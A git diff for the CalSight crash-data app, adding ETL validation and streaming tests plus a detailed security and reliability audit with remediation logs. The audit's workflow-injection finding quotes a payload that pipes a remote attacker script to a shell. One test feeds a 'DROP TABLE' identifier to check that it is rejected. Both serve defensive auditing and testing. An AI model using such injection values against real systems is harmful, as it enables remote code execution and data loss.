+
+    def __init__(self, counts):
+        self._counts = list(counts)
+
+    def execute(self, *_args, **_kwargs):
+        return _FakeResult(self._counts.pop(0) if self._counts else 0)
+
+
+def test_validate_job_no_table_is_skipped():
+    from etl.orchestrator import _validate_job
+
+    job = Job(name="demographics", module="etl.load_demographics", table_name=None)
+    status, summary = _validate_job(_FakeDB([]), job, rows_before=None)
+    assert status == "skipped"
+    assert summary is None
+
+
+def test_validate_job_growth_passes():
+    from etl.orchestrator import _validate_job
+
+    job = Job(name="parties", module="etl.x", table_name="crash_parties", max_drop_pct=5)
+    # current count (queried by check_row_count_growth) grew vs rows_before
+    status, _ = _validate_job(_FakeDB([1_050_000]), job, rows_before=1_000_000)
+    assert status == "passed"
+
+
+def test_validate_job_large_drop_fails():
+    from etl.orchestrator import _validate_job
+
+    job = Job(name="parties", module="etl.x", table_name="crash_parties", max_drop_pct=5)
+    # 50% drop, well beyond max_drop_pct=5 → critical failure → "failed"
+    status, summary = _validate_job(_FakeDB([500_000]), job, rows_before=1_000_000)
+    assert status == "failed"
+    assert "crash_parties_row_count" in summary
+
+
+def test_validate_job_small_drop_within_threshold_passes():
+    from etl.orchestrator import _validate_job
+
+    job = Job(name="parties", module="etl.x", table_name="crash_parties", max_drop_pct=10)
+    # 2% drop, within max_drop_pct=10 → not a failure
+    status, _ = _validate_job(_FakeDB([980_000]), job, rows_before=1_000_000)
+    assert status == "passed"
+
+
+def test_validate_job_swallows_check_errors():
+    from etl.orchestrator import _validate_job
+
+    class _BoomDB:
+        def execute(self, *_a, **_k):
+            raise RuntimeError("connection lost")
+
+    job = Job(name="parties", module="etl.x", table_name="crash_parties")
+    status, summary = _validate_job(_BoomDB(), job, rows_before=1_000_000)
+    # A broken check must not fail an otherwise-successful load.
+    assert status == "skipped"
+    assert "validation error" in summary
+
+
+def test_table_row_count_rejects_bad_identifier():
+    from etl.orchestrator import _table_row_count
+
+    # Never interpolate a suspicious identifier into SQL.
+    assert _table_row_count(_FakeDB([5]), "crashes; DROP TABLE x") is None
+    assert _table_row_count(_FakeDB([]), None) is None
+
+
 def test_cli_dry_run():
     result = subprocess.run(
         [sys.executable, "-m", "etl.run_all", "--dry-run"],

--- a/backend/tests/test_switrs_api.py
+++ b/backend/tests/test_switrs_api.py
@@ -139,8 +139,65 @@ class TestTransformSwitrs:
         assert dt.hour == 0
         assert dt.minute == 0
 
+    def test_malformed_time_falls_back_to_midnight(self):
+        """Non-numeric time values ('UNK:00') appear in the archive; one bad
+        row must not abort the multi-hour load — fall back to midnight."""
+        for bad in ("UNK:00", "abc", "25:99:00", "-1:30"):
+            result = transform_switrs({**SAMPLE_SWITRS_ROW, "collision_time": bad})
+            dt = result["crash_datetime"]
+            assert isinstance(dt, datetime), f"Failed for {bad!r}"
+            assert (dt.hour, dt.minute) == (0, 0), f"Failed for {bad!r}"
+
     def test_handles_two_digit_county(self):
         """county_city_location '1900' should yield county_code 19."""
         result = transform_switrs({**SAMPLE_SWITRS_ROW, "county_city_location": "1900"})
 
         assert result["county_code"] == 19
+
+
+class TestIterCrashesFromSqlite:
+    """The streaming reader must yield bounded batches — materializing the
+    full 15-year archive (~6-7M dicts) has OOM-killed the ETL VM before."""
+
+    def _make_db(self, tmp_path, rows):
+        import sqlite3
+
+        path = tmp_path / "switrs.sqlite"
+        conn = sqlite3.connect(path)
+        cols = ", ".join(SAMPLE_SWITRS_ROW.keys())
+        placeholders = ", ".join("?" for _ in SAMPLE_SWITRS_ROW)
+        conn.execute(f"CREATE TABLE collisions ({cols})")
+        conn.executemany(
+            f"INSERT INTO collisions ({cols}) VALUES ({placeholders})",
+            [tuple(r[k] for k in SAMPLE_SWITRS_ROW) for r in rows],
+        )
+        conn.commit()
+        conn.close()
+        return str(path)
+
+    def test_yields_batches_of_at_most_batch_size(self, tmp_path):
+        from etl.switrs_api import iter_crashes_from_sqlite
+
+        rows = [
+            {**SAMPLE_SWITRS_ROW, "case_id": 1000 + i, "collision_date": "2012-07-15"}
+            for i in range(5)
+        ]
+        path = self._make_db(tmp_path, rows)
+
+        batches = list(iter_crashes_from_sqlite(path, 2012, 2012, batch_size=2))
+        assert [len(b) for b in batches] == [2, 2, 1]
+        assert {r["collision_id"] for b in batches for r in b} == {1000, 1001, 1002, 1003, 1004}
+
+    def test_skips_rows_without_id_or_date(self, tmp_path):
+        from etl.switrs_api import iter_crashes_from_sqlite
+
+        rows = [
+            {**SAMPLE_SWITRS_ROW, "case_id": 1},
+            {**SAMPLE_SWITRS_ROW, "case_id": None},
+            {**SAMPLE_SWITRS_ROW, "case_id": 3, "collision_date": None},
+        ]
+        path = self._make_db(tmp_path, rows)
+
+        batches = list(iter_crashes_from_sqlite(path, 2012, 2012, batch_size=10))
+        all_rows = [r for b in batches for r in b]
+        assert [r["collision_id"] for r in all_rows] == [1]

--- a/docker-compose.pipeline.yml
+++ b/docker-compose.pipeline.yml
@@ -16,8 +16,12 @@ services:
     env_file:
       - ./backend/.env
     environment:
-      # Override for pipeline-specific settings
-      ALERT_WEBHOOK_URL: ${ALERT_WEBHOOK_URL:-}
+      # Pipeline-specific settings. ALERT_WEBHOOK_URL deliberately has no
+      # `environment:` override: it lives in backend/.env (env_file above),
+      # which deploys preserve. An override interpolated from the shell
+      # (${ALERT_WEBHOOK_URL:-}) would win over env_file and blank the value
+      # whenever CI runs `docker compose up`, since the deploy shell never
+      # sets it.
       BACKUP_DIR: /backups
     volumes:
       # Backup volume — persists pg_dump files outside the container

--- a/docs/audit-2026-07-01.md
+++ b/docs/audit-2026-07-01.md
@@ -473,12 +473,40 @@ Fixed and verified on `claude/project-audit-grhhmp` (all suites green after each
   longer masquerade as "filters too restrictive".
 - **M-F3** — entering Builder mode no longer wipes built charts.
 
-**Not yet addressed** (highest-value remaining): H-I3 (.env truncation on deploy),
-H-I4 (pipeline container not redeployed), M-I1 (read-only role not actually used in
-prod / `ETL_DATABASE_URL` unset), H-B2 (validation framework dead code), H-B3 (pool
-sizing), H-B4 (advisory-lock idle transaction), H-B5 (SWITRS memory), C5 (heatmap
-point accumulation), H-F5 (dual ask-AI state), the a11y cluster (H-F11–13), and the
-AI-answer-correctness items (M-B5–M-B7).
+### Wave 2 (same day)
+
+- **H-B5** — SWITRS loader streams batches from SQLite (`iter_crashes_from_sqlite`)
+  instead of materializing ~6-7M dicts; **M-B1** — malformed `collision_time` falls
+  back to midnight instead of aborting the load. Streaming + skip tests added.
+- **H-B4** — pipeline advisory lock moved to a dedicated AUTOCOMMIT connection; no
+  more multi-hour idle-in-transaction blocking autovacuum.
+- **H-B3** — API pool sized per-worker via settings (4×10 = 40 peak, was 160).
+- **M-B6** — `query_crashes`/`get_trend` return an explicit error for unresolvable
+  county names instead of silently returning statewide numbers; **M-B7** —
+  `get_crash_rate` annualizes multi-year totals before dividing by single-year
+  denominators (adds `years_covered`/`rate_basis`); **M-B5** — `group_by=rate` +
+  `cause` now 422s. Integration tests added for all three.
+- **H-I3** — deploy/.run-etl `.env` writes are non-destructive: managed keys
+  refreshed, operator keys (R2_*, HEARTBEAT_URL, ETL_API_KEY, …) preserved; merge
+  logic fixture-tested. **H-I4** — pipeline container rebuilt + recreated on every
+  deploy; `ALERT_WEBHOOK_URL` shell-interpolated override removed from
+  `docker-compose.pipeline.yml` (it would have blanked the env_file value).
+- **H-F11** — LayersPanel toggles are real switches (`role="switch"`,
+  `aria-checked`, accessible names, sr-only lock explanation); e2e spec updated to
+  role-based selectors; component tests added. **M-F19** — the palette prop now
+  actually reaches crash dots (colorblind-safe palette works; legend swatches match).
+  **H-F10** — heatmap failures show a dismissible error card with Retry instead of a
+  blank map. **M-F7** — batched heatmap pagination advances past legitimately empty
+  batches instead of stalling forever.
+
+Verified: 485 backend unit + 212 integration + 571 frontend tests pass; ruff/tsc/eslint clean.
+
+**Not yet addressed** (highest-value remaining): M-I1 (read-only role not actually used
+in prod — set `ETL_DATABASE_URL` as an operator key in backend/.env, which deploys now
+preserve), H-B2 (validation framework dead code / fabricated `passed` status), C5
+(heatmap point accumulation on county drill-down), H-F5 (dual ask-AI instances
+clobbering shared history), H-F7 (timelapse request storm), H-F8 (ChartCard memo
+defeat), H-F12/H-F13 (combobox semantics), M-B8–M-B12, and the medium/low backlog.
 
 ## Recommended priority order
 

--- a/docs/audit-2026-07-01.md
+++ b/docs/audit-2026-07-01.md
@@ -501,12 +501,23 @@ Fixed and verified on `claude/project-audit-grhhmp` (all suites green after each
 
 Verified: 485 backend unit + 212 integration + 571 frontend tests pass; ruff/tsc/eslint clean.
 
+### Wave 3 (2026-07-02)
+
+- **H-B2** — the ETL validation framework is now wired in. `run_job` captures
+  `rows_before`/`rows_after` around the load and calls a new `_validate_job` helper
+  that runs `run_validation_suite` plus a per-job `check_row_count_growth`
+  (honoring `Job.max_drop_pct`). `validation_status` is now real —
+  `passed`/`warning`/`failed`/`skipped` — instead of a hardcoded `passed`; the
+  outcome and a failing-check summary land in `diff_summary`. Validation stays
+  non-blocking (a failed check doesn't flip the load to `error`) and a broken check
+  can't fail an otherwise-successful load. Table names are identifier-validated
+  before interpolation. 6 unit tests added (703 backend tests pass).
+
 **Not yet addressed** (highest-value remaining): M-I1 (read-only role not actually used
 in prod — set `ETL_DATABASE_URL` as an operator key in backend/.env, which deploys now
-preserve), H-B2 (validation framework dead code / fabricated `passed` status), C5
-(heatmap point accumulation on county drill-down), H-F5 (dual ask-AI instances
-clobbering shared history), H-F7 (timelapse request storm), H-F8 (ChartCard memo
-defeat), H-F12/H-F13 (combobox semantics), M-B8–M-B12, and the medium/low backlog.
+preserve), C5 (heatmap point accumulation on county drill-down), H-F12/H-F13 (combobox
+semantics), M-B8–M-B12, and the medium/low backlog. (H-F5, H-F7, H-F8 in progress this
+wave.)
 
 ## Recommended priority order
 

--- a/docs/audit-2026-07-01.md
+++ b/docs/audit-2026-07-01.md
@@ -431,6 +431,55 @@ correct pattern exists in-repo at `ChoroplethLegend.tsx:112-165`.)
 
 ---
 
+## Remediation log (2026-07-01, this branch)
+
+Fixed and verified on `claude/project-audit-grhhmp` (all suites green after each change:
+482 backend unit + 205 integration + 561 frontend tests, tsc/ruff/eslint clean):
+
+- **C1** — `select_years_to_load()` extracted; current + previous year now always reload
+  (upsert-safe), historical years still skip; hardcoded `--end 2026` removed from
+  `jobs.py` (also fixes L1). Six regression tests added, including year-rollover.
+- **C2** — `/api/ask` worker thread now owns its DB session (created/closed in-thread);
+  request teardown can no longer close a session mid-query. A deadline check between
+  tool rounds stops burning LLM quota after the client's 504.
+- **C3** — deploy.yml now triggers via `workflow_run` on CI success for main only; deploys
+  the CI-validated `head_sha`, not the branch head.
+- **C4** — backend image installs `postgresql-client-17` from PGDG (was v15 vs a v17
+  server); scheduler backup now delegates to `etl/backup.py` (password off the cmdline,
+  R2 upload + rotation wired in, warning alert when R2 upload fails). Double-upload in
+  `backup.py` removed; `BACKUP_DIR` env respected. **Still to do: one restore test on prod.**
+- **H-S1 / M-S1** — `run-etl.yml` input passed via `env:` + validated against
+  `^[a-z0-9_]+$`; `permissions: contents: read` added.
+- **H-I1** — production deploys queue (`cancel-in-progress: false`).
+- **H-I2** — rollback now excludes the just-deployed SHA when picking the previous image.
+- **M-I7** — prune actually keeps the 5 newest SHA tags; CI got a concurrency group (M-I4).
+- **H-B1** — new migration `v0w1x2y3z4a5` creates `chat_feedback` if missing (**new
+  finding: the model was never migrated at all**) and grants the read-only role
+  SELECT+INSERT on it; verified INSERT allowed / DELETE denied as `calsight_api_ro`;
+  `create_readonly_role.sql` updated. Two endpoint tests added.
+- **H-F1** — drag-reorder insertion-index/item-index mismatch fixed via
+  `insertionIndexToItemIndex()`; regression tests added.
+- **H-F2** — admin key now stored in sessionStorage after verify and sent as
+  `X-ETL-API-Key` on all `/api/etl/*` calls; 403 clears the key and re-locks the guard;
+  legacy localStorage boolean migrated away.
+- **H-F3** — service-worker API routes use function matchers covering both same-origin
+  dev and the cross-origin prod API origin; NetworkOnly guard stays first.
+- **H-F4** — crawler middleware HTML-escapes all interpolated values and uses function
+  replacers (no `$`-pattern mangling); tests added.
+- **H-F5 partially / H-F6** — `sendMessage` now enforces the cooldown for every caller;
+  the AI companion's "Go deeper" disables with a countdown. (H-F5 dual-instance history
+  clobbering remains open.)
+- **H-F9** — `yearStatsQ` included in the choropleth error aggregate; fetch failures no
+  longer masquerade as "filters too restrictive".
+- **M-F3** — entering Builder mode no longer wipes built charts.
+
+**Not yet addressed** (highest-value remaining): H-I3 (.env truncation on deploy),
+H-I4 (pipeline container not redeployed), M-I1 (read-only role not actually used in
+prod / `ETL_DATABASE_URL` unset), H-B2 (validation framework dead code), H-B3 (pool
+sizing), H-B4 (advisory-lock idle transaction), H-B5 (SWITRS memory), C5 (heatmap
+point accumulation), H-F5 (dual ask-AI state), the a11y cluster (H-F11–13), and the
+AI-answer-correctness items (M-B5–M-B7).
+
 ## Recommended priority order
 
 1. **This week — data integrity & recovery (silent failures):**

--- a/docs/audit-2026-07-01.md
+++ b/docs/audit-2026-07-01.md
@@ -540,10 +540,26 @@ Verified: 485 backend unit + 212 integration + 571 frontend tests pass; ruff/tsc
 
 Verified together: tsc clean, 0 lint errors, 576 frontend tests pass.
 
-**Not yet addressed** (highest-value remaining): M-I1 (read-only role not actually used
+### Wave 4 (2026-07-02) — CI green-up + last high a11y
+
+- **PR #348 CI fixes**: docker-build (base pinned to `python:3.12-slim-trixie`, pg client 17
+  installed natively — the floating slim tag had moved bookworm→trixie, breaking the
+  bookworm PGDG pin); CodeQL high alert cleared by building the ETL row-count query with
+  SQLAlchemy Core rather than an f-string, then by holding the admin ETL key in memory
+  instead of sessionStorage (`js/clear-text-storage-of-sensitive-data`).
+- **H-F12 / H-F13** — county multi-select and map search bar now have proper
+  combobox/listbox semantics (`aria-expanded`, `aria-controls`, `role=option`/
+  `aria-selected`, `aria-activedescendant`), Escape-to-close with focus return, de-nested
+  result/favorite buttons, and labeled icon buttons. 8 new tests.
+
+**Every critical and every high finding is now remediated.** Remaining work is medium/low +
+operational.
+
+**Not yet addressed** (medium/low + operational): M-I1 (read-only role not actually used
 in prod — set `ETL_DATABASE_URL` as an operator key in backend/.env, which deploys now
-preserve), C5 deep rework (spatial index / canvas dots for the per-pan scan),
-H-F12/H-F13 (combobox semantics), M-B8–M-B12, and the medium/low backlog.
+preserve), the pre-merge `pg_dump`/`pg_restore` verification for C4, C5 deep rework
+(spatial index / canvas dots for the per-pan scan — the accumulation bound is already in),
+M-B8–M-B12, and the broader medium/low backlog.
 
 ## Recommended priority order
 

--- a/docs/audit-2026-07-01.md
+++ b/docs/audit-2026-07-01.md
@@ -527,12 +527,23 @@ Verified: 485 backend unit + 212 integration + 571 frontend tests pass; ruff/tsc
   via a ref so non-dragged cards keep stable props during a drag. Render-count tests
   prove unrelated re-renders and drags don't re-render other cards.
 
-Verified together: tsc clean, 0 lint errors, 575 frontend tests pass.
+- **C5 (contained slice)** — county heatmap accumulation is now bounded at
+  `MAX_HEATMAP_POINTS` (600k). The hook stops fetching once the ceiling is hit (no more
+  pulling millions of rows just to discard them), clamps the accumulator to the cap,
+  and uses `concat` instead of spreading a multi-million-element array into a fresh
+  literal each batch. A `loadedUpTo` marker gates advancement so the cap check can't
+  race the accumulation. MapPage surfaces a "showing a sample of N" notice so the cap
+  isn't silent (per the audit's no-silent-caps rule). Cap + advancement-halt test added.
+  Note: this bounds the memory/main-thread/network cost; the deeper wins (spatial index
+  for the per-pan `bounds.contains` scan, canvas rendering) are left as follow-ups —
+  the dot layer is already viewport-culled to ≤800 markers.
+
+Verified together: tsc clean, 0 lint errors, 576 frontend tests pass.
 
 **Not yet addressed** (highest-value remaining): M-I1 (read-only role not actually used
 in prod — set `ETL_DATABASE_URL` as an operator key in backend/.env, which deploys now
-preserve), C5 (heatmap point accumulation on county drill-down), H-F12/H-F13 (combobox
-semantics), M-B8–M-B12, and the medium/low backlog.
+preserve), C5 deep rework (spatial index / canvas dots for the per-pan scan),
+H-F12/H-F13 (combobox semantics), M-B8–M-B12, and the medium/low backlog.
 
 ## Recommended priority order
 

--- a/docs/audit-2026-07-01.md
+++ b/docs/audit-2026-07-01.md
@@ -513,11 +513,26 @@ Verified: 485 backend unit + 212 integration + 571 frontend tests pass; ruff/tsc
   can't fail an otherwise-successful load. Table names are identifier-validated
   before interpolation. 6 unit tests added (703 backend tests pass).
 
+- **H-F5** — the two independent `useAskAi` instances (companion + AskAiPage) that
+  clobbered each other's sessionStorage history are unified: conversation state lifted
+  into a single app-level `AskAiProvider`; `useAskAi()` is now a context reader with an
+  identical public API. In-flight/abort guards and persistence run exactly once. Shared-
+  state test added (two consumers see the same messages, one fetch).
+- **H-F7** — timelapse no longer restorms the API each tick: the 7 year-independent
+  supplemental endpoints move to a stable-keyed query fetched once; only `/stats/batch`
+  re-keys per year; the Pearson matrix recompute is memoized on its actual inputs. Test
+  asserts 4 year ticks = 4 batch fetches but 1 fetch per supplemental endpoint.
+- **H-F8** — `React.memo(ChartCard)` holds again: DashboardGrid passes stable per-id
+  handler/drag-prop maps and an `EMPTY_DATA` sentinel; `useDragReorder` reads dragState
+  via a ref so non-dragged cards keep stable props during a drag. Render-count tests
+  prove unrelated re-renders and drags don't re-render other cards.
+
+Verified together: tsc clean, 0 lint errors, 575 frontend tests pass.
+
 **Not yet addressed** (highest-value remaining): M-I1 (read-only role not actually used
 in prod — set `ETL_DATABASE_URL` as an operator key in backend/.env, which deploys now
 preserve), C5 (heatmap point accumulation on county drill-down), H-F12/H-F13 (combobox
-semantics), M-B8–M-B12, and the medium/low backlog. (H-F5, H-F7, H-F8 in progress this
-wave.)
+semantics), M-B8–M-B12, and the medium/low backlog.
 
 ## Recommended priority order
 

--- a/docs/audit-2026-07-01.md
+++ b/docs/audit-2026-07-01.md
@@ -1,0 +1,452 @@
+# CalSight Full Project Audit — 2026-07-01
+
+Full-codebase audit covering the backend (FastAPI/SQLAlchemy/ETL), frontend (React 19/Vite/PWA),
+security posture, infrastructure/CI-CD, dependencies, and test health. Four parallel deep-audit
+passes plus independent verification runs. All findings include file references; severities are
+critical / high / medium / low.
+
+## Executive summary
+
+**Verification (all run in a clean environment):**
+
+| Check | Result |
+|---|---|
+| Backend unit tests | 476 passed |
+| Backend integration tests | 203 passed |
+| Frontend tests (vitest) | 542 passed (68 files) |
+| TypeScript (`tsc -b`) | clean |
+| ESLint | 0 errors, 28 warnings (mostly `react-hooks/exhaustive-deps`) |
+| ruff | clean |
+| `npm audit` | 0 vulnerabilities (prod + dev) |
+| `pip-audit` (requirements.txt) | 0 known CVEs |
+
+**Finding counts (deduplicated across audit passes):** 5 critical, 22 high, ~55 medium, ~45 low.
+
+**The three themes that matter most:**
+
+1. **Data pipeline integrity** — the daily crash ingest very likely no-ops after a year's first
+   load (C1), validation gates are dead code reporting fabricated `passed` status (H-B2), and the
+   scheduled backup path is probably broken end-to-end (C4). All three fail *silently green*.
+2. **Deploy-safety theater** — CI does not gate deploys (C3), the rollback step can never find a
+   previous image (H-I2), deploys wipe operator-set env vars (H-I3), and the ETL container never
+   gets the new image (H-I4).
+3. **Frontend integration seams** — the pieces that unit tests can't see: admin ETL page never
+   sends its auth header (H-F2), prod service-worker API caching never matches (H-F3),
+   drag-reorder indices are off by one (H-F1), and the county heatmap path accumulates unbounded
+   points on the main thread (C5).
+
+Security posture is strong overall: **no SQL injection surface** (the NLQ/AI feature uses a fixed
+typed tool registry, not LLM-generated SQL), no hardcoded secrets, constant-time key comparison,
+read-only API DB role design, SHA-pinned actions, and a correctly-guarded `pull_request_target`.
+The two high-severity security items are both on the self-hosted CI runner.
+
+---
+
+## Critical
+
+### C1 — Daily crash ingestion silently stops after the first load of each year
+`backend/etl/load_crashes.py:252-257`, `backend/etl/load_crashes.py:71-82`, `backend/etl/jobs.py:16-25`
+
+`run()` skips any year that already has rows: `get_loaded_years()` counts *any* crashes per
+calendar year (not even filtered by `data_source`). The daily `crashes_ccrs` job runs
+`--start 2016 --end 2026` **without `--force`**, so once 2026 has one batch loaded, every
+subsequent daily run is a no-op. The weekly "full refresh" doesn't help: `force_refresh=True`
+(`pipeline.py:146`) only bypasses the orchestrator freshness check — it never passes `--force`
+to the subprocess. Meanwhile `load_parties_victims.py:87-102` *does* re-refresh current+previous
+year daily, so parties/victims drift out of sync with their parent crashes.
+
+**Failure mode:** `EtlRun` rows show `status=success, rows_loaded=0`, freshness dashboards stay
+green, and the nightly CHP CCRS update ingests nothing. The ON CONFLICT upsert machinery exists
+precisely to make re-loading safe, and `etl/incremental.py` was built to solve this — but it is
+100% dead code (never imported).
+
+### C2 — `/api/ask` timeout leaks a live DB session into the connection pool
+`backend/app/routers/ask.py:141-150`, `backend/app/database.py:41-42`
+
+`asyncio.wait_for(asyncio.to_thread(_handle_ask, body, db), timeout=60)` — on timeout the handler
+returns 504 and FastAPI's `get_db` teardown closes the Session **while the worker thread is still
+executing queries and LLM calls on it**. The connection returns to the pool mid-use; a concurrent
+request can be handed the same connection while the orphan thread still writes to it → protocol
+desync, corrupted results, `InterfaceError`s that poison the pool. The abandoned thread also keeps
+burning up to 3 more LLM provider rounds after the client already got its 504.
+
+### C3 — Production deploy is not gated by CI
+`.github/workflows/deploy.yml:3-5` vs `.github/workflows/ci.yml:3-7`
+
+Both workflows trigger independently on `push: main`. Deploy has no `workflow_run` dependency, no
+`needs`, and no check that tests/lint/CodeQL passed. A commit with failing tests deploys to
+production in parallel with the CI run that would have caught it.
+
+### C4 — The scheduled backup path is very likely broken end-to-end
+`backend/Dockerfile:8`, `backend/etl/pipeline.py:200-212`, `docs/OPERATOR_SETUP.md:31-49`
+
+Backups run inside the backend image (`python:3.12-slim` = Debian bookworm), where
+`apt-get install postgresql-client` installs **pg_dump 15**. The database is PostgreSQL 17/16;
+pg_dump aborts on `server version mismatch` when the server major is newer. Additionally the
+scheduler's `run_backup` in `pipeline.py` never calls `upload_to_r2()` — OPERATOR_SETUP.md itself
+admits "there is likely no offsite copy today." Net effect: probable **zero working recovery
+points for an 11M-row dataset**, silently (the `min_keep` rotation guard keeps old dumps around
+and masks the failure). Needs `postgresql-client-17` from PGDG plus the R2 wiring.
+**Verify immediately:** run one real `pg_dump` + `pg_restore` on the prod host.
+
+### C5 — Unbounded crash-point accumulation + full main-thread rescan per pan
+`frontend/src/hooks/useCrashHeatmap.ts:138-161`, `frontend/src/components/map/CrashDotLayer.tsx:50-65`, `frontend/src/components/map/CrashHeatmap.tsx:136-159`
+
+County drill-down auto-loads *all* batches (150k pts each) into one array via
+`[...prev, ...points]` (O(n²) copying) with no cap and no spatial index; every batch re-runs
+`setLatLngs` over the whole set plus a full fatal-severity filter rebuild, and at zoom ≥14 every
+`moveend` re-filters the entire array with `bounds.contains()` (allocating a `LatLng` per point).
+Select Los Angeles County with County Detail on → millions of resident objects, multi-second
+freezes per pan, GC thrash, mobile tab kills — on the app's headline feature.
+
+---
+
+## High
+
+### Security / CI-runner
+
+**H-S1. Command/expression injection in `run-etl.yml` on the self-hosted prod runner** —
+`.github/workflows/run-etl.yml:77`.
+`docker compose ... exec -T backend python -m "etl.${{ inputs.job }}"`: the Actions expression is
+expanded *before* the shell parses the line, so quotes give no protection. Anyone who can dispatch
+the workflow supplies `job: x"; curl attacker.sh | sh; #` and gets a shell on the production
+runner — the same host where `backend/.env` full of production secrets was just written.
+Fix: pass `inputs.job` via `env:`, reference as `"$JOB"`, validate against `^[a-z0-9_]+$`.
+
+**H-S2. Local Postgres and Vite dev server published on `0.0.0.0` with default creds** —
+`docker-compose.yml:11,13,40`. `"5433:5432"` binds all interfaces with password `calsight_dev`;
+anyone on the same LAN gets full read/write. Mitigated by the `local-db` profile being off by
+default, but it's a footgun. Fix: `127.0.0.1:5433:5432`.
+
+### Deploy pipeline
+
+**H-I1. `cancel-in-progress: true` on the production deploy** — `deploy.yml:7-9`. A second push
+to main cancels an in-flight deploy, potentially killing `alembic upgrade head` or a multi-hour
+backfill mid-run. Deploys should queue, not cancel.
+
+**H-I2. Rollback step is dead code** — `deploy.yml:159-176`. `docker images ... | grep -v latest |
+head -1` lists newest-first, so the "previous" SHA found is the **current** one (tagged before the
+health check); the guard then fails and every real failure prints "No previous image available for
+rollback." Production has no functioning rollback despite the workflow claiming one.
+Fix: `sed -n 2p` or filter out `${{ github.sha }}`.
+
+**H-I3. Every deploy truncates `backend/.env` and rewrites only 15 known keys** —
+`deploy.yml:68`, `run-etl.yml:58`. `HEARTBEAT_URL`, `R2_*` (offsite backups),
+`DISCORD_BACKUP_WEBHOOK`, `ETL_API_KEY`, `ALERT_WEBHOOK_URL`, `MAINTENANCE_MODE`,
+`ETL_DATABASE_URL` are read by code but never written — the dead-man's switch, offsite backups,
+backup notifications, and the ETL API key are silently disabled by the next deploy even if an
+operator configures them. (A comment at deploy.yml:84-89 documents this failure mode already
+biting once with SENTRY_DSN.)
+
+**H-I4. The ETL pipeline container is never redeployed** — `deploy.yml:112` vs
+`docker-compose.pipeline.yml:7`. Deploy runs `up -d` on `docker-compose.prod.yml` only; the
+pipeline service keeps running the **old image** after every deploy until someone manually
+recreates it.
+
+**H-I5. Production secrets persist as plaintext on the runner** — `deploy.yml:67-89`,
+`run-etl.yml:57-74`. ~11 secrets written to `backend/.env` in the checkout dir of a persistent
+self-hosted runner and never cleaned up. Fix: `if: always()` cleanup step.
+
+### Backend
+
+**H-B1. `POST /api/feedback` writes through the read-only API role** —
+`backend/app/routers/ask.py:106-119`, `backend/sql/create_readonly_role.sql`. The INSERT into
+`chat_feedback` fails with `permission denied` under `calsight_api_ro`; works in dev, breaks only
+in prod. *Interplay with M-I1 below: deploy never sets `ETL_DATABASE_URL` and alembic succeeds on
+`DATABASE_URL`, which suggests prod actually runs the API on a full-privilege role — meaning
+either feedback is broken (if the RO role is used) or the read-only defense is not actually
+enforced (if it isn't). One of the two is true; both need fixing.*
+
+**H-B2. Validation framework is dead code; `validation_status="passed"` is fabricated** —
+`backend/etl/orchestrator.py:144`, `backend/etl/validation.py:323`, `backend/etl/jobs.py`.
+`run_validation_suite` is never called, `Job.max_drop_pct` on all 25 jobs is never read. A
+truncated CKAN response that wipes half a table records `validation_status=passed`.
+
+**H-B3. Connection pool sized without accounting for 4 gunicorn workers** —
+`backend/app/database.py:9-15` × Dockerfile `-w 4` = up to 160 connections against a Postgres
+whose `max_connections` is typically ~100. Under burst, the API exhausts server slots and
+`/api/health` itself starts failing.
+
+**H-B4. Pipeline advisory-lock session idles in transaction for the entire multi-hour ETL run** —
+`backend/etl/orchestrator.py:225-242`. Pins the xmin horizon for hours across a run that upserts
+millions of rows → autovacuum can't reclaim dead tuples → progressive bloat of the 11M-row table.
+If the connection drops mid-run, the lock silently releases and a second pipeline can start.
+
+**H-B5. SWITRS load materializes all years in memory** — `backend/etl/load_crashes.py:283`,
+`backend/etl/switrs_api.py:256-315`. Returns ~6-7M 25-key dicts (multi-GB RSS) before the first
+upsert, on a VM with documented exit-137 OOM history. The CCRS path streams correctly.
+
+### Frontend
+
+**H-F1. Dashboard drag-and-drop reorder is broken** — `frontend/src/hooks/useDragReorder.ts:137-156,203-217`,
+`frontend/src/hooks/useDashboardConfig.ts:114-124`. `getDropIndex` returns an *insertion* index
+but `reorderChart` treats it as an *item* index: drops at the end are silently rejected, downward
+drops land one slot past the indicator. The keyboard path uses item indices and is correct, which
+masks the bug in tests.
+
+**H-F2. Admin ETL page can never work: the verified key is never sent to the API** —
+`frontend/src/components/AdminGuard.tsx:32-42`, `frontend/src/hooks/useEtlStatus.ts:38,51,67`.
+The guard verifies the key, stores a boolean, and discards it; the backend requires
+`X-ETL-API-Key` on `/api/etl/*` but no ETL fetch sends headers. Admin unlocks the UI, then every
+call 403s forever. (Not a security hole — the backend correctly rejects — but the feature is
+nonfunctional.)
+
+**H-F3. All `/api/*` service-worker runtime caching is dead in production** —
+`frontend/vite.config.ts:41-62`, `frontend/src/config.ts:1`. Workbox RegExp routes only match
+cross-origin URLs from position 0; prod API is `https://api.calsight.org`, so `/\/api\/(stats|…)/`
+never matches. Offline in prod, most data pages just error despite config appearing to cover them.
+
+**H-F4. HTML injection into crawler-served pages via `counties` query param** —
+`frontend/functions/_middleware.ts:88-90,126-161`. Unescaped interpolation into
+`<meta content="...">`; a crafted `counties` value breaks out of the attribute in pages served to
+crawler user-agents → SEO/link-preview poisoning (CSP blunts script execution). Fix: HTML-escape
+all interpolated values.
+
+**H-F5. Two live `useAskAi` instances clobber the shared conversation history** —
+`frontend/src/hooks/useAskAi.ts:70,84-86`, `AiCompanion.tsx:35`, `AskAiPage.tsx:47`. Each holds
+independent state loaded at mount and writes the entire array back to localStorage; using the
+companion after chatting on `/ask` silently drops every `/ask` message since page load.
+
+**H-F6. AI companion "Go deeper" bypasses the rate-limit cooldown** — `useAskAi.ts:100-101`,
+`AiCompanion.tsx:132-133`. `sendMessage` never checks `cooldownEnd`; users can fire deep-dives
+during a server-mandated 429 backoff, provoking more 429s.
+
+**H-F7. Timelapse playback fires ~190 HTTP requests per run** — `frontend/src/pages/StatsPage.tsx:84,165-174,771`,
+`frontend/src/hooks/useCorrelationData.ts:159-183`. Each ~2s tick creates a new query key fetching
+`stats/batch` + 7 supplemental endpoints and recomputes a 29×29 Pearson matrix.
+
+**H-F8. `React.memo(ChartCard)` fully defeated; every chart re-renders per grid render including
+per-pixel during drag** — `DashboardGrid.tsx:168-179`, `ChartCard.tsx:257,564`,
+`useDragReorder.ts:288-304`. Fresh arrow-function props break memoization.
+
+**H-F9. Fetch error masquerades as "Your filters are too restrictive"** —
+`frontend/src/hooks/useChoroplethData.ts:274,310`, `MapPage.tsx:691-734`. `isError` omits the
+query that supplies `totalCrashes`; if only that request fails, users see an empty state inviting
+them to clear their (fine) filters.
+
